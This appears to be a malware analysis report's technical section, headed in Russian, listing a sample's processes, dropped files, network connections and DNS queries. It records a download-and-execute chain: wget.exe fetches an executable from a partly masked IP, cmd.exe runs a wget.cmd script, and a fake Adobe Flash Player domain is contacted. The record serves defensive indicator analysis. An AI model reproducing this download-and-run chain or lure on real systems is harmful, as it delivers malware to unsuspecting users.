Техническая информация
- '%TEMP%\8797654345678.exe' (загружен из сети Интернет)
- '%TEMP%\wget.exe' http://37.##0.198.188/"8797654345678.exe"
- '%TEMP%\8797654345678.exe'
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\wget.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- %TEMP%\wget.cmd
- %TEMP%\8797654345678.exe
- %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\flashplayer[1]
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\wget.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'ge#.#dobe.com':80
- '37.##0.198.188':80
- 'localhost':1037
- http://ge#.#dobe.com/flashplayer
- http://37.##0.198.188/8797654345678.exe
- DNS ASK ge#.#dobe.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''